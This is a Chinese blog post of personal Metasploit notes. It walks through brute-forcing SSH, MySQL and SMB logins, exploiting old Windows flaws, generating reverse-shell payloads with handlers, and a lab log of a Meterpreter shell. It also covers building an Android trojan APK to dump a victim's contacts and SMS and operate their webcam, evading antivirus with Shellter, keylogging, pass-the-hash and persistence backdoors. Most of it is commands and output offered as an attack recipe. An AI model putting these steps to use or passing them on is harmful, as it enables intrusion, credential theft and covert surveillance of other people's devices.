MSF笔记(二)

密码破解模块

Ssh服务口令猜测

SSH 为 Secure Shell 的缩写,由 IETF 的网络小组(Network Working Group)所制定;SSH 为建立在应用层和传输层基础上的安全协议。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题

!!!!!!!!!!!!
如果知道什么漏洞,然后想找模块,就如

Search ms08_067
msf > search ms08_067
   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption


msf > use exploit/windows/smb/ms08_067_netapi 

比如针对ssh的口令

也是
Search ssh

然后去找msf > search ssh_logName

    Disclosure Date  Rank    Description
   ----                                    ---------------  ----    -----------
   auxiliary/scanner/ssh/ssh_login                          normal  SSH Login Check Scanner
   auxiliary/scanner/ssh/ssh_login_pubkey                   normal  SSH Public Key Login Scanner

查看参数
进行设置

Set RHOSTS IP
Set PASS_FILE 密码文件
Set USENAME 用户名,也可以是用户名字典

Exploit 就开始进行爆破了

破解口令就是login

msf > search mysql_login



   Name                                 Disclosure Date  Rank    Description
   ----                                 ---------------  ----    -----------
   auxiliary/scanner/mysql/mysql_login                   normal  MySQL Login Utility

几乎就是一样的,直接search XXX
然后use 返回的目录,然后设置参数
然后exploit

Tomact~~~~

同样
然后设置参数
用户,密码字典文件

SMB
同样~~~

漏洞利用模块

常用命令

用指定关键字搜索可利用漏洞

Search 名
Use 模块路径 就可以使用了。

查看参数
Show options

Show targets 显示目标(os版本)
Set TARGET 设置目标版本
Exploit 开始漏洞攻击
Sessions -l 列出会话
Sessions -i 选择会话
Sessions -k 结束会话
Ctrl+z 把会话放到后台
Ctrl+c 结束会话

Show auxiliary 显示辅助模块
Use auxiliary name 使用辅助模块

Run 运行模块


MS01_002

显示的里面设置
设置载荷

Set payload windows/meterpreter/reverse_tcp

SRVHOST 0.0.0.0 设置的是自己的IP
以这个做网址,让别人来访问

也可以设置端口

设置根目录 set URLPATH/

Set LHOST 自己IP 作为反弹SHELL连接的IP
Set LPORT 反弹回来连接的端口

访问后,会产生一个会话,然后
Sessions -i
看看会话
Sessions -i ID

选择会话后
进入
Meterpreter>

这就拿到系统权限了

还有ms10_018
也试了下,,我的xp没成功。。。

Ms10_046

Ms08_067
直接就可以攻击,“`

Ms12-004

LInux samba漏洞

影响 Samba 3.0 debain

Shellcode的使用

在目标机器上运行一段机器指令,返回shell

Shellcode

Windows
Linux
Android
Java
Php

生成shellcode

因为我的kali 升级了,没有了msfpayload
直接在终端下输入
要用msfvenom ,并且要 -P 才可以产生payload

监听shellcode
在msf下
use exploit/multi/handler

设置载荷,和生成的要一样,设置IP和端口也要一样

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.150.131
LHOST => 192.168.150.131
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > show options 

攻击,开始监听

运行后

msf exploit(handler) > exploit 

[*] Started reverse TCP handler on 192.168.150.131:4444 
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 192.168.150.128
[*] Meterpreter session 1 opened (192.168.150.131:4444 -> 192.168.150.128:1828) at 2016-07-15 05:53:15 +0800

meterpreter > shell
Process 3356 created.
Channel 1 created.
Microsoft Windows XP [�汾 5.1.2600]
(C) ��Ȩ���� 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\����>

C:\Documents and Settings\Administrator\����>

C:\Documents and Settings\Administrator\����>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter ��������:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 192.168.150.128
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.150.2

生成linux shellcode
与window不同的就是载荷不同

Linux/x86/meterpreter/reverse_tcp

其他一样

Linux的是没有后缀
运行时 ./文件名

Java也是就是payload不同

Java/meterpreter/reverse_tcp

PHP

Php/meterpreter/reverse_tcp

-f 选择输出文件类型

去访问就拿到了~

入侵安卓
都一样的

贴下给的文本

入侵安卓手机

首先入侵手机的原理是 你需要生成一个安卓手机的木马程序xxx.apk 安卓安装程序安装到你的手机上去。
然后运行这个安卓程序。然后这个木马就会反弹连接你的电脑,然后你就可以控制他的手机了,原理就这些
首先条件就是
1 网络能够联通,手机木马反连接你 他的手机首先能上网,你的ip得是外网ip,如果在内网也可以。
2 你需要想办法让他安装你生成的木马并运行。就ok了

步骤1
生成木马程序 192.168.1.105 我的电脑ip 7777是反连接我的端口号,不能用已经使用的端口号。
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=7777 R > /root/cracer.apk
生成木马的位置名字cracer.apk
use exploit/mutli/handler
set payload android/meterpreter/reverse_tcp
set LHOST 172.16.1.105
exploit

打开msf用来侦听反连接的木马
ok 生成完毕了 吧生成好的木马拿出来发给手机
我安装上安卓木马
安装完打开
我们看侦听的结果
ok 我打开木马
反链我了

dump_contacts –这个是导出电话
dump_sms –这个是导出信息
Webcam_list可以看到有几个摄像头
-i 1 是选择后摄像头
webcam_snap 是拍照 ,看到我电脑了
webcam_stream 开启摄像头

Shellcode的常规免杀

最好使用别的免杀工具

使用多重编码免杀

现在使用的话会被杀~~~

加壳
Upx -5 文件名

Veil免杀(用这个)

或者用国外的免杀

Shellter免杀

下载shellter

Unzip 解压

在解压shellter_v4.9zip

运行shellter.exe

先给权限

Chmod 777

./shellter.exe

显示红酒瓶
输入A

PE Target:/root/putty1.exe

他会自动备份

会让你选择payload
输入
L
选择第一个
1
输入反弹监听的IP
端口

在msf中设置监听
Payload就是windows那个
同样设置IP和端口

生成的文件就是puttry1.exe

这个就是木马了
可以过360~~~

Meterpreter常用命令

Screenshot 截屏

Sysinfo 获取系统运行的平台

Keyscan_start
Keyscan_dump
获取键盘记录

Ps 查看进行
Migrate 1774 切换进行

Run post/windows/capture/keylog_recoder
记录键盘输入

利用hash登陆

获取hash

Hashdump
管理员的MD5加密值

在msf下

Use exploit/windows/smb/psexec
设置载荷,就是之前的反弹连接的载荷

要设置被攻击电脑的IP
设置 登陆名称
Hash值

持久控制

进程迁移
Run post/windows/manage/migrate
关闭杀软

可以去强制结束杀毒的进程
Kill 进程id

查看目标主机所有流量
Run packetrecorder -i 1
提取系统信息
Run scraper

持久控制

Run persistence -X -i 50 -p 端口 -r 自己的IP
就可以让他没50秒连接一次我

然后正常的监听

持久控制服务器

也是先生成马

监听

安装长久的后门
Run metsvc -A

然后在msf下
还是设置监听,载荷

31337 端口

开3389
使用批处理
exe
Sql说

也就是说可以上网查开3389的bat~~~

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值